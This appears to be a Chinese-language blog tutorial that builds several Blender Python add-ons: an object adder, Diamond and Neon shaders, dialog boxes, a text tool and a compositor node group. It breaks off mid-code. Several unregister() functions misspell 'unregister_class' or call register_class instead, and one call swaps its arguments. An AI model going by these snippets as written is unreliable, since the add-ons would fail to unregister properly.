    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',

    }

    import bpy


    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout
    layout.scale_y = 1.4

    row = layout.row()
    row.label(text='Add an object', icon='OBJECT_ORIGIN')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout
    obj = context.object

    row = layout.row()
    row.label(text='Select an option to scale your object.', icon='FONT_DATA')
    row = layout.row()
    row.operator('transform.resize')
    row = layout.row()
    layout.scale_y = 1.2

    col = layout.column()
    col.prop(obj, 'scale')


    class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Special Option', icon='COLOR_BLUE')
    row = layout.row()
    row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
    row.operator('object.subdivision_set')
    row = layout.row()
    row.operator('object.modifier_add')


    def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)


    def unregister():
    bpy.utils.unsregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.register_class(PanelB)


    if __name__ == '__main__':
    register()

    jpg

    也可以通过 Edit-Preferences-Install... 的方式安装其他人写好的插件:

    jpg

    Preview: The Shader Library Add-on (Python Tutorial Result)

    How to create an Addon (The Shader Library)

    教你怎么用 Python 写一个 Shader 插件:

    调整窗口布局,一个 Shader Editor,一个 3D Viewport,一个 Text Editor:

    jpg

    这段代码定义了一个名为"Shader Libraey"的 Blender 插件,该插件提供了一个名为"Diamond"的着色器,可以在 3D 视图的工具栏中的"Shader Library"选项卡中访问。当用户点击该选项卡时,将显示一个面板,其中包含一个"选择要添加的着色器"标签和一个"Diamond"按钮,当用户单击该按钮时,将创建一个着色器并应用于活动对象上。

    具体而言,该代码文件首先定义了包含插件名称、作者、版本等信息的字典。接下来定义了一个面板类 ShaderMainPanel,它作为面板的主要控件,用于渲染用户界面。该面板包含一个文本标签和一个名为"shader.diamond_operator"的操作器,后者定义了所需的 Diamond 着色器。在操作器的 execute()函数中,创建一个新材质,激活其节点编辑模式,删除默认的 Principled BSDF 节点,然后创建和连接多个颜色为红、绿、蓝的玻璃节点,最后创建混合节点和连接多个节点以生成最终的 Diamond 着色器,将其分配给当前活动对象。

    最后,定义了两个函数 register()和 unregister(),它们用于在 Blender 应用程序中注册和取消注册插件的类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    bl_info = {
    'name': 'Shader Libraey',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Shader',

    }

    import bpy


    class ShaderMainPanel(bpy.types.Panel):
    bl_label = "Shader Library"
    bl_idname = "SHADER_PT_MAINPANEL"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Shader Library"

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Shader to be added.')
    row.operator('shader.diamond_operator')


    # Create a Custom Operator for the Diamond Shader
    class SHADER_OT_DIAMOND(bpy.types.Operator):
    bl_label = "Diamond"
    bl_idname = "shader.diamond_operator"

    def execute(self, context):
    # Creating a New Shader and calling it Diamond
    material_diamond = bpy.data.materials.new(name="Diamond")
    # Enabling Use Nodes
    material_diamond.use_nodes = True
    # Removing the Principled Node
    material_diamond.node_tree.nodes.remove(material_diamond.node_tree.nodes.get('Principled BSDF'))
    # Create a reference to the Material Output
    material_output = material_diamond.node_tree.nodes.get('Material Output')
    # Set location of node
    material_output.location = (-400,0)

    # Adding Glass1 Node
    glass1_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass1_node.location = (-600,0)
    # Setting the Default Color
    glass1_node.inputs[0].default_value = (1, 0, 0, 1)
    # Setting the Default IOR Value
    glass1_node.inputs[2].default_value = 1.446

    # Adding Glass2 Node
    glass2_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass2_node.location = (-600, -150)
    # Setting the Default Color
    glass2_node.inputs[0].default_value = (0, 1, 0, 1)
    # Setting the Default IOR Value
    glass2_node.inputs[2].default_value = 1.450

    # Adding Glass3 Node
    glass3_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass3_node.location = (-600, -300)
    # Setting the Default Color
    glass3_node.inputs[0].default_value = (0, 0, 1, 1)
    # Setting the Default IOR Value
    glass3_node.inputs[2].default_value = 1.450

    # Create the Add Shader Node and Reference it as 'Add1'
    add1_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
    # Setting the Location
    add1_node.location = (-400,-50)
    # Setting the Label
    add1_node.label = "Add 1"
    # Minimizes the Node
    add1_node.hide = True
    # Deselect the Node
    add1_node.select = False

    # Create the Add Shader Node and Reference it as 'Add2'
    add2_node = material_diamond.node_tree.nodes.new('ShaderNodeAddShader')
    # Setting the Location
    add2_node.location = (0,0)
    # Setting the Label
    add2_node.label = "Add 2"
    # Minimizes the Node
    add2_node.hide = True
    # Deselect the Node
    add2_node.select = False

    # Adding Glass4 Node
    glass4_node = material_diamond.node_tree.nodes.new('ShaderNodeBsdfGlass')
    # Set location of node
    glass4_node.location = (-150, -150)
    # Setting the Default Color
    glass4_node.inputs[0].default_value = (1, 1, 1, 1)
    # Setting the Default IOR Value
    glass4_node.inputs[2].default_value = 1.450
    # Deselect the Node
    glass4_node.select = False

    # Create the Mix Shader Node and Reference it as 'Mix1'
    mix1_node = material_diamond.node_tree.nodes.new('ShaderNodeMixShader')
    # Setting the Location
    mix1_node.location = (200,0)
    # Deselect the Node
    mix1_node.select = False

    # Creating Links between the Nodes
    material_diamond.node_tree.links.new(glass1_node.outputs[0], add1_node.inputs[0])
    material_diamond.node_tree.links.new(glass2_node.outputs[0], add1_node.inputs[1])
    material_diamond.node_tree.links.new(add1_node.outputs[0], add2_node.inputs[0])
    material_diamond.node_tree.links.new(glass3_node.outputs[0], add2_node.inputs[1])
    material_diamond.node_tree.links.new(add2_node.outputs[0], mix1_node.inputs[1])
    material_diamond.node_tree.links.new(glass4_node.outputs[0], mix1_node.inputs[2])
    material_diamond.node_tree.links.new(mix1_node.outputs[0], material_output.inputs[0])
    bpy.context.object.active_material = material_diamond

    return {'FINISHED'}


    def register():
    bpy.utils.register_class(ShaderMainPanel)
    bpy.utils.register_class(SHADER_OT_DIAMOND)


    def unregister():
    bpy.utils.unregister_class(ShaderMainPanel)
    bpy.utils.unregister_class(SHADER_OT_DIAMOND)


    if __name__ == '__main__':
    register()

    Edit-Preferences-Add-ons-搜索extra-Add Mesh: Extra Objects,这样 Blender 中就可以创建钻石形状的物体。

    jpg

    创建一个钻石形状的物体,运行代码,点击 Diamond,就给该物体添加了一个 Shader:

    jpg

    可以从 Darkfall : Blender Python Tutorial: How to create an Add-on - The Shader Library [bpy] (darkfallblender.blogspot.com) 中的 ShaderLibrary.py - Google Drive 下载作者写的更复杂的 ShaderLibrary.py

    Add a keyframe & Modifier with Python [learn python for beginners]

    这段代码定义了一个名为"Hello World Panel"的 Blender 插件,该插件提供了一个名为"Neon"的着色器,可以在 3D 视图的工具栏中的"Name your New Tab"选项卡中访问。当用户点击该选项卡时,将显示一个面板,其中包含一个"Add Neon Shader"按钮,当用户单击该按钮时,将创建一个着色器并应用于活动对象上。

    具体而言,该代码文件首先定义了一个名为 HelloWorldPanel 的面板类,该类作为面板的主要控件,用于渲染用户界面。该面板包含一个按钮,名为"shader.neon_operator"。在操作器的 execute()函数中,创建一个新材质,激活其节点编辑模式,删除默认的 Principled BSDF 节点,然后创建和连接多个颜色为蓝色、灰色的玻璃节点,最后创建混合节点和连接多个节点以生成最终的 Neon 着色器,将其分配给当前活动对象。

    最后,定义了两个函数 register()和 unregister(),它们用于在 Blender 应用程序中注册和取消注册插件的类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    import bpy


    class HelloWorldPanel(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Hello World Panel"
    bl_idname = "OBJECT_PT_hello"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Name your New Tab"

    def draw(self, context):
    layout = self.layout

    obj = context.object

    row = layout.row()
    row.operator('shader.neon_operator')


    class SHADER_OT_NEON(bpy.types.Operator):
    bl_label = 'Add Neon Shader'
    bl_idname = 'shader.neon_operator'

    def execute(self, context):
    cur_frame = bpy.context.scene.frame_current

    # Creating a New Shader and calling it Neon
    material_neon = bpy.data.materials.new(name= "Neon")
    # Enabling Use Nodes
    material_neon.use_nodes = True

    tree = material_neon.node_tree

    # removing the Principled Node
    material_neon.node_tree.nodes.remove(material_neon.node_tree.nodes.get('Principled BSDF'))
    # Create a reference to the Material Output
    material_output = material_neon.node_tree.nodes.get('Material Output')
    # Set location of node
    material_output.location = (400,0)

    # Adding Glass1 Node
    emiss_node = material_neon.node_tree.nodes.new('ShaderNodeEmission')
    # Set location of node
    emiss_node.location = (200,0)
    # Setting the Default Color
    emiss_node.inputs[0].default_value = (0.59, 0.76, 1, 1)
    # Setting the Default IOR Value
    emiss_node.inputs[1].default_value = 2
    emiss_node.inputs[1].keyframe_insert('default_value', frame=cur_frame)

    data_path = f'nodes["{emiss_node.name}"].inputs[1].default_value'

    fcurves = tree.animation_data.action.fcurves
    fc = fcurves.find(data_path)
    if fc:
    new_mod = fc.modifiers.new('NOISE')
    new_mod.strength = 10
    new_mod.depth = 1

    material_neon.node_tree.links.new(emiss_node.outputs[0], material_output.inputs[0])

    return {'FINISHED'}

    def register():
    bpy.utils.register_class(HelloWorldPanel)
    bpy.utils.register_class(SHADER_OT_NEON)


    def unregister():
    bpy.utils.unregister_class(HelloWorldPanel)
    bpy.utils.unregister_class(SHADER_OT_NEON)


    if __name__ == "__main__":
    register()

    创建了一个 shader 和一个 modifiers,使得绑定的物体一闪一闪的。

    jpg

    Create a popup dialog box

    定义了一个 WM_OT_myOp 类,提供了一个 dialog box 提示,原视频的 Blender 版本有点旧,替换了一些代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):

    t = self.text
    s = self.scale

    bpy.ops.mesh.primitive_cube_add()
    obj = bpy.context.object
    obj.name = t
    obj.scale[0] = s[0]
    obj.scale[1] = s[1]
    obj.scale[2] = s[2]

    return {'FINISHED'}


    def invoke(self, context, event):

    return context.window_manager.invoke_props_dialog(self)

    整合到之前的 AddObjectScript.py 中,代码 row.operator('wm.myop', icon='CUBE', text='Cube') 将创建的 bl_idname = 'wm.myop'WM_OT_myOp 加入到 TestPanel 中:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    bl_info = {
    'name': 'Object Adder',
    'author': 'Darkfall',
    'version': (1, 0),
    'blender': (3, 51, 0),
    'location': 'View3d > Tool',
    'warning': '',
    'wiki_url': '',
    'category': 'Add Mesh',

    }

    import bpy


    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout
    layout.scale_y = 1.4

    row = layout.row()
    row.label(text='Add an object', icon='OBJECT_ORIGIN')
    row = layout.row()
    row.operator('wm.myop', icon='CUBE', text='Cube')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    class PanelA(bpy.types.Panel):
    bl_label = "Scale"
    bl_idname = "PT_PanelA"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout
    obj = context.object

    row = layout.row()
    row.label(text='Select an option to scale your object.', icon='FONT_DATA')
    row = layout.row()
    row.operator('transform.resize')
    row = layout.row()
    layout.scale_y = 1.2

    col = layout.column()
    col.prop(obj, 'scale')


    class PanelB(bpy.types.Panel):
    bl_label = "Specials"
    bl_idname = "PT_PanelB"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'
    bl_parent_id = 'PT_TestPanel'
    bl_options = {'DEFAULT_CLOSED'}

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Select a Special Option', icon='COLOR_BLUE')
    row = layout.row()
    row.operator('object.shade_smooth', icon='MOD_SMOOTH', text='Set Smooth Shading')
    row.operator('object.subdivision_set')
    row = layout.row()
    row.operator('object.modifier_add')


    class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):

    t = self.text
    s = self.scale

    bpy.ops.mesh.primitive_cube_add()
    obj = bpy.context.object
    obj.name = t
    obj.scale[0] = s[0]
    obj.scale[1] = s[1]
    obj.scale[2] = s[2]

    return {'FINISHED'}


    def invoke(self, context, event):

    return context.window_manager.invoke_props_dialog(self)


    def register():
    bpy.utils.register_class(TestPanel)
    bpy.utils.register_class(PanelA)
    bpy.utils.register_class(PanelB)
    bpy.utils.register_class(WM_OT_myOp)


    def unregister():
    bpy.utils.unsregister_class(TestPanel)
    bpy.utils.unregister_class(PanelA)
    bpy.utils.register_class(PanelB)
    bpy.utils.unregister_class(WM_OT_myOp)


    if __name__ == '__main__':
    register()

    开跑!点击 OK 就会创建一个相应名称和 Scale 的立方体。

    jpg

    Creating the Text Tool Add-on

    这是一个简单的 Blender 插件,提供了一个 “Text Tool” 面板,用于添加文本对象。插件为用户提供了一些选项,如文本内容、比例尺度、是否居中编辑原点、是否挤压等。

    在代码的开头,bl_info 字典定义了插件的基本信息,包括名称、作者、版本、Blender 版本要求、描述等等。这些信息将会在 Blender 中进行显示和识别。

    OBJECT_PT_TextTool 类定义了插件的 UI 面板,在 View3D 视图中的 “Add” 菜单下可以找到它。面板中有一个按钮,用于调用 WM_OT_textOp 操作器类,添加指定的文本对象。

    WM_OT_textOp 操作器类定义了添加文本对象的过程,并通过执行 execute() 方法在场景中添加文本对象。使用 invoke() 方法显示属性对话框,以便用户可以设置文本对象的属性。

    在代码的末尾,register() 方法用于注册插件的类,unregister() 方法用于注销这些类。这使得 Blender 工具栏能够正确地显示插件,并在需要时供用户使用。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 51, 0),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
    }

    import bpy

    class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


    class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)

    def execute(self, context):

    t = self.text
    s = self.scale
    c = self.center
    e = self.extrude
    ea = self.extrude_amount

    bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
    bpy.ops.font.delete(type='PREVIOUS_WORD')
    bpy.ops.font.text_insert(text=t)
    bpy.ops.object.editmode_toggle()

    if e == True:
    bpy.context.object.data.extrude = ea

    if c == True:
    bpy.context.object.data.align_x = 'CENTER'
    bpy.context.object.data.align_y = 'CENTER'
    return {'FINISHED'}

    def invoke(self, context, event):
    return context.window_manager.invoke_props_dialog(self)


    def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    if __name__ == "__main__":
    register()

    这将创建一个文字,是否居中和具有高度都是可选的。

    jpg

    Create Custom Node Group

    Blender 的节点组是将多个节点整合在一起,以便于在不同的场景中重复使用。通过创建自定义节点组,用户可以自定义一组节点,然后在需要时将它们重复使用,而无需每次都手动连接一堆节点。

    节点组可以包含多个输入和输出,这使得节点的使用更加灵活。例如,可以将某个算法封装在一个自定义节点组中,然后将其作为子程序一样反复使用,从而使整个工作流程更加高效。

    除此之外,节点组还可以将多个节点封装在一起,隐藏内部的复杂性,从而简化整个项目的结构和管理。如果想要共享或者将你的节点组应用到其他项目中,你可以将它们保存为 .blend 文件或者 Python 脚本。

    总之,节点组是 Blender 中非常实用的功能之一,它可以帮助用户提高工作效率,并简化项目管理流程,同时也使 Blender 更加强大和灵活。

    这段代码是一个 Blender 插件,用于创建自定义节点组。

    首先,代码定义了一个 NODE_PT_MAINPANEL 类,继承自 bpy.types.Panel 类,表示一个面板面板,包含在节点编辑器(NODE_EDITOR)中的 UI 区域(UI),并将其放在「New Tab」分类下。bl_label 设置面板名称为「Custom Node Group」,bl_idname 表示唯一 ID,用于在代码中引用该面板。

    create_test_group() 函数用于创建节点组。它接收三个参数:context 对象、operator 对象和 group_name 字符串。此函数使用 bpy.data.node_groups.new() 创建一个新的节点组对象,并设置其类型为 'CompositorNodeTree',意味着创建一个合成节点树。接下来,该函数创建输入和输出节点,以及两个中间节点,并将它们连接起来。最后,该函数返回新创建的节点组对象。

    NODE_OT_TEST 类继承自 bpy.types.Operator 类,代表一个操作员。bl_label 表示该操作员的名称,bl_idname 表示唯一 ID,用于在代码中引用该操作员。execute() 方法在执行该操作员时被调用,可以看到该方法调用 create_test_group() 函数创建自定义节点组,并将其添加到场景中。

    最后,register()unregister() 函数分别用于注册和注销 Blender 插件。register_class()unregister_class() 方法被用于添加和移除定义的面板(NODE_PT_MAINPANEL)和操作员(NODE_OT_TEST),使它们在 Blender 中可用。if __name__ == "__main__": 代码块用于直接运行该脚本。这个代码块中的 register() 方法将插件注册到 Blender 中,使它可以在运行时使用。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    import bpy


    class NODE_PT_MAINPANEL(bpy.types.Panel):
    bl_label = "Custom Node Group"
    bl_idname = "NODE_PT_MAINPANEL"
    bl_space_type = 'NODE_EDITOR'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.operator('node.test_operator')


    def create_test_group(context, operator, group_name):

    # enable use nodes
    bpy.context.scene.use_nodes = True

    test_group = bpy.data.node_groups.new(group_name, 'CompositorNodeTree')

    group_in = test_group.nodes.new('NodeGroupInput')
    group_in.location = (-200,0)
    test_group.inputs.new('NodeSocketFloat','Factor Value') #0
    test_group.inputs.new('NodeSocketColor','Color Input') #1


    group_out = test_group.nodes.new('NodeGroupOutput')
    group_out.location = (400,0)
    test_group.outputs.new('NodeSocketColor','Output')


    mask_node = test_group.nodes.new(type= 'CompositorNodeBoxMask')
    mask_node.location = (0,0)
    mask_node.rotation = 1

    mix_node = test_group.nodes.new(type= 'CompositorNodeMixRGB')
    mix_node.location = (200,0)
    mix_node.use_clamp = True
    mix_node.blend_type = 'OVERLAY'


    link = test_group.links.new

    link(mask_node.outputs[0], mix_node.inputs[1])

    link(group_in.outputs[0], mix_node.inputs[0])
    link(group_in.outputs[1], mix_node.inputs[2])

    link(mix_node.outputs[0], group_out.inputs[0])

    return test_group


    class NODE_OT_TEST(bpy.types.Operator):
    bl_label = "Add Custom Node Group"
    bl_idname = "node.test_operator"

    def execute(self, context):

    custom_node_name = "Test Node"
    my_group = create_test_group(self, context, custom_node_name)
    test_node = context.scene.node_tree.nodes.new('CompositorNodeGroup')
    test_node.node_tree = bpy.data.node_groups[my_group.name]
    test_node.use_custom_color = True
    test_node.color = (0.5, 0.4, 0.3)

    return {'FINISHED'}


    def register():
    bpy.utils.register_class(NODE_PT_MAINPANEL)
    bpy.utils.register_class(NODE_OT_TEST)


    def unregister():
    bpy.utils.unregister_class(NODE_PT_MAINPANEL)
    bpy.utils.unregister_class(NODE_OT_TEST)


    if __name__ == "__main__":
    register()

    Custom Drawing / Layout Improvements

    美化了之前 TextTool.py 的界面:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    bl_info = {
    "name": "Text Tool",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (3, 51, 0),
    "location": "View3D > Add > Mesh > New Object",
    "description": "Adds a new Mesh Object",
    "warning": "",
    "doc_url": "",
    "category": "Add Mesh",
    }

    import bpy

    class OBJECT_PT_TextTool(bpy.types.Panel):
    """Creates a Panel in the Object properties window"""
    bl_label = "Text Tool"
    bl_idname = "OBJECT_PT_TextTool"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Text Tool'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.operator('wm.textop', text='Add Text', icon='OUTLINER_OB_FONT')


    class WM_OT_textOp(bpy.types.Operator):
    bl_label = 'Text Tool Operator'
    bl_idname = 'wm.textop'

    text: bpy.props.StringProperty(name='Enter Text', default='')
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))
    rotation: bpy.props.BoolProperty(name='Z up', default=False)
    center: bpy.props.BoolProperty(name='Center Origin', default=False)
    extrude: bpy.props.BoolProperty(name='Extrude', default=False)
    extrude_amount: bpy.props.FloatProperty(name='Extrude Amount', default=0.06)


    def draw(self, context):
    layout = self.layout
    layout.separator(factor=1)
    layout.label(text='Sample Text')

    layout.prop(self, 'text')
    layout.prop(self, 'scale')

    layout.separator(factor=2)

    box = layout.box()

    row = box.row()
    row.prop(self, 'rotation')
    if self.rotation == True:
    row.label(text='Orientation: Z UP', icon='EMPTY_SINGLE_ARROW')
    else:
    row.label(text='Orientation: Default', icon='ARROW_LEFTRIGHT')

    row = box.row()
    row.prop(self, 'center')
    if self.center == True:
    row.label(text='Alignment: Center', icon='ALIGN_CENTER')
    else:
    row.label(text='Alignment: Default', icon='ALIGN_LEFT')

    row = box.row()
    row.prop(self, 'extrude')
    if self.extrude == True:
    row.prop(self, 'extrude_amount')


    def execute(self, context):

    t = self.text
    s = self.scale
    c = self.center
    e = self.extrude
    ea = self.extrude_amount
    r = self.rotation

    bpy.ops.object.text_add(enter_editmode=True, location=(0, 0, 0))
    bpy.ops.font.delete(type='PREVIOUS_WORD')
    bpy.ops.font.text_insert(text=t)
    bpy.ops.object.editmode_toggle()

    if r == True:
    bpy.context.object.rotation_euler[0] = 1.5708
    if e == True:
    bpy.context.object.data.extrude = ea

    if c == True:
    bpy.context.object.data.align_x = 'CENTER'
    bpy.context.object.data.align_y = 'CENTER'
    return {'FINISHED'}

    def invoke(self, context, event):
    return context.window_manager.invoke_props_dialog(self)


    def register():
    bpy.utils.register_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    def unregister():
    bpy.utils.unregister_class(OBJECT_PT_TextTool)
    bpy.utils.register_class(WM_OT_textOp)


    if __name__ == "__main__":
    register()

    jpg

    Shortcut / Custom Keymap [learn python for beginners]

    修改 popupdialogboxTemplate.py,使其可以通过按下 SHIFT+F 打开 dialog box:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    import bpy

    class WM_OT_myOp(bpy.types.Operator):
    """Open the Add Cube Dialog Box"""
    bl_label = 'Add Cube Dialog Box'
    bl_idname = 'wm.myop'

    # text = bpy.props.StringProperty(name='Enter Text', default='')
    text: bpy.props.StringProperty(name='Enter Text', default='')
    # scale = bpy.props.FloatVectorProperty(name='Scale', default=1)
    scale: bpy.props.FloatVectorProperty(name='Scale', default=(1, 1, 1))

    def execute(self, context):

    t = self.text
